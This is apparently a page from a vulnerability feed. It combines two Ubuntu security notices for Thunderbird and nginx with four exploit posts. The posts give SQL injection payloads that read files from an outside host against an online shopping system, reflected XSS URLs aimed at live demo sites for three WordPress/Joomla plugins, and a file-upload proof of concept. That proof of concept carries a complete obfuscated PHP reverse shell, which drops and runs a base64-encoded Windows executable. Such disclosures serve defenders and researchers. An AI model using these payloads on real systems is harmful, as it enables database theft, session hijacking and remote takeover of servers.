Ubuntu Security Notice 5663-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, spoof the mouse pointer position, obtain sensitive information, spoof the contents of the addressbar, bypass security restrictions, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5663-1October 07, 2022thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service, spoof the mouse pointer position, obtain sensitive information, spoof thecontents of the addressbar, bypass security restrictions, or executearbitrary code. (CVE-2022-2505, CVE-2022-36318, CVE-2022-36319,CVE-2022-38472, CVE-2022-38473, CVE-2022-38476 CVE-2022-38477,CVE-2022-38478)Multiple security issues were discovered in Thunderbird. An attacker couldpotentially exploit these in order to determine when a user opens aspecially crafted message. (CVE-2022-3032, CVE-2022-3034)It was discovered that Thunderbird did not correctly handle HTML messagesthat contain a meta tag in some circumstances. If a user were tricked intoreplying to a specially crafted message, an attacker could potentiallyexploit this to obtain sensitive information. (CVE-2022-3033)A security issue was discovered with the Matrix SDK in Thunderbird. Anattacker sharing a room with a user could potentially exploit this tocause a denial of service. (CVE-2022-36059)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  thunderbird                     1:102.2.2+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:102.2.2+build1-0ubuntu0.20.04.1Ubuntu 18.04 LTS:  thunderbird                     1:102.2.2+build1-0ubuntu0.18.04.1After a standard system update you need to restart Thunderbird to makeall the necessary changes.References:  https://ubuntu.com/security/notices/USN-5663-1  CVE-2022-2505, CVE-2022-3032, CVE-2022-3033, CVE-2022-3034,  CVE-2022-36059, CVE-2022-36318, CVE-2022-36319, CVE-2022-38472,  CVE-2022-38473, CVE-2022-38476, CVE-2022-38477, CVE-2022-38478Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:102.2.2+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.2.2+build1-0ubuntu0.20.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:102.2.2+build1-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5663-1

Ubuntu Security Notice 5371-3 - USN-5371-1 and USN-5371-2 fixed several vulnerabilities in nginx. This update provides the corresponding update for CVE-2020-11724 for Ubuntu 16.04 ESM. It was discovered that nginx Lua module mishandled certain inputs. An attacker could possibly use this issue to perform an HTTP Request Smuggling attack. This issue was fixed for Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. It was discovered that nginx Lua module mishandled certain inputs. An attacker could possibly use this issue to disclose sensitive information. This issue only affects Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. It was discovered that nginx mishandled the use of compatible certificates among multiple encryption protocols. If a remote attacker were able to intercept the communication, this issue could be used to redirect traffic between subdomains.

==========================================================================  
Ubuntu Security Notice USN-5371-3  
October 07, 2022

nginx vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

A security issue was fixed in nginx's lua module.

Software Description:  
- nginx: small, powerful, scalable web/proxy server

Details:

USN-5371-1 and USN-5371-2 fixed several vulnerabilities in nginx.  
This update provides the corresponding update for CVE-2020-11724  
for Ubuntu 16.04 ESM.

Original advisory details:

 It was discovered that nginx Lua module mishandled certain inputs.  
 An attacker could possibly use this issue to perform an HTTP Request  
 Smuggling attack. This issue was fixed for Ubuntu 18.04 LTS and  
 Ubuntu 20.04 LTS. (CVE-2020-11724)

  It was discovered that nginx Lua module mishandled certain inputs.  
 An attacker could possibly use this issue to disclose sensitive  
 information. This issue only affects Ubuntu 18.04 LTS and  
 Ubuntu 20.04 LTS. (CVE-2020-36309)

  It was discovered that nginx mishandled the use of   
 compatible certificates among multiple encryption protocols.   
 If a remote attacker were able to intercept the communication,   
 this issue could be used to redirect traffic between subdomains.  
 (CVE-2021-3618)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
  nginx-core                      1.10.3-0ubuntu0.16.04.5+esm4  
  nginx-extras                    1.10.3-0ubuntu0.16.04.5+esm4  
  nginx-full                      1.10.3-0ubuntu0.16.04.5+esm4  
  nginx-light                     1.10.3-0ubuntu0.16.04.5+esm4

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5371-3  
  https://ubuntu.com/security/notices/USN-5371-1  
  CVE-2020-11724

Ubuntu Security Notice USN-5371-3

Online Shopping System Advanced version 1.0 suffers from multiple remote SQL injection vulnerabilities.

The online-shopping-system-advanced-1.0 suffers from multiple SQLiThe attacker can steal all information from the database of this system.Status: CRITICAL[+] Exploit:```MYSQLParameter: cid (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''OR NOT 4084=4084 AND 'icSi'='icSi Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#```--------------------------------------------------------------------------------------------```MYSQLParameter: password (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on````--------------------------------------------------------------------------------------------```MYSQL```## And more:```txt[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php[password parameter]][1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php[email parameter]][1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [nameparameter]]```PoC:https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

Online Shopping System Advanced 1.0 SQL Injection

WordPress eCommerce Product Catalog plugin version 3.0.70 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable Crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : wordpress.org/plugins/ecommerce-product-catalog/                           ││  Vendor   : impleCode - implecode.com                                                  ││  Software : WordPress eCommerce Product Catalog 3.0.70                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'product_category' is vulnerable to XSSPath: /product-category/clothing/sunglasses/men/ https://demo.implecode.com/product-category/clothing/sunglasses/men/?product_category=40&gr0ln%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ewop2e=1[-] Done

WordPress eCommerce Product Catalog 3.0.70 Cross Site Scripting

WordPress / Joomla JReviews extension version 4.1.5 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : ClickFWD LLC. - jreviews.com                                               ││  Software : WordPress JReviews 4.1.5                                                   ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'listview' is vulnerable to XSSPath: /top-user-rated-listings https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&qrrwx%22%3e%3cscript%3ealert(1)%3c%2fscript%3et16n9=1URL parameter 'format' is vulnerable to XSSPath: /advanced-search/search-resultshttps://wp-demo.jreviews.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&mzh9g%22%3e%3cscript%3ealert(1)%3c%2fscript%3ei8emo=1[-] Done

WordPress / Joomla JReviews 4.1.5 Cross Site Scripting

Joomla Vik Rent Car extension version 1.14 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable Crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Rent Car 1.14                                                   ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘parameter 'returnplace' is vulnerable to XSSPath: index.php/en/search-your-car https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=l2cno%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efobrc&task=showprc&Itemid=104&categories=2&goon=Continueparameter 'categories' is vulnerable to XSSPath: index.php/en/search-your-carhttps://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=3&task=showprc&Itemid=104&categories=o41bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eml8z0&goon=Continue[-] Done

Joomla Vik Rent Car 1.14 Cross Site Scripting

Web Based Student Clearance version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Web Based Student Clearance 1.0 - Unrestricted File Upload 
leads to Remote Code Execution (Authenticated) 
# Date: 08-10-2022 
# Exploit Author: Akash Pandey ( L3V1ATH0N ) 
# Vendor Homepage: 
https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html 
# Software Link: 
https://www.sourcecodester.com/download-code?nid=15627&title=Web-Based+Student+Clearance+System+in+PHP+Free+Source+Code 
# Version: v1.0 
# Tested on: Windows, XAMPP, Kali Linux 
# CVE :

----- POC -----

Note : The reverse shell below is for Windows based PHP reverse shell. 
If the target host is using Linux then the Linux based PHP reverse shell 
must be used.

---------------

Request : URL - 
http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
=========

POST 
/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
HTTP/1.1 
Host: 192.168.1.12 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 
Firefox/91.0 
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: multipart/form-data; 
boundary=---------------------------71268058833541201443517047173 
Content-Length: 6864 
Origin: http://192.168.1.12 
Connection: close 
Referer: 
http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm 
Upgrade-Insecure-Requests: 1

-----------------------------71268058833541201443517047173

Content-Disposition: form-data; name="userImage"; filename="shell.php" 
Content-Type: application/x-php

<?php

header('Content-type: text/plain'); 
$ip = "192.168.1.26"; //change this 
$port = "80"; //change this 
$payload = 
"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"; 
$evalCode = gzinflate(base64_decode($payload)); 
$evalArguments = " ".$port." ".$ip; 
$tmpdir ="C:\\windows\\temp"; 
chdir($tmpdir); 
$res .= "Using dir : ".$tmpdir; 
$filename = "D3fa1t_shell.exe"; 
$file = fopen($filename, 'wb'); 
fwrite($file, $evalCode); 
fclose($file); 
$path = $filename; 
$cmd = $path.$evalArguments; 
$res .= "\n\nExecuting : ".$cmd."\n"; 
echo $res; 
$output = system($cmd);

?>

-----------------------------71268058833541201443517047173

Content-Disposition: form-data; name="btnedit"

-----------------------------71268058833541201443517047173--

========================================= 
End of Request 
=========================================

Response: 
========

HTTP/1.1 302 Found 
Date: Sat, 08 Oct 2022 09:30:51 GMT 
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 
X-Powered-By: PHP/7.4.30 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate 
Pragma: no-cache 
Location: edit-photo.php 
Connection: close 
Content-Type: text/html; charset=UTF-8 
Content-Length: 8575

======================================== 
End of Response 
========================================

The Reverse Shell is located at below URL 
-----------------------------------------

Request: URL - 
http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php 
========

GET 
/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php 
HTTP/1.1 
Host: 192.168.1.12 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 
Firefox/91.0 
Accept: image/webp,*/* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Referer: 
http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
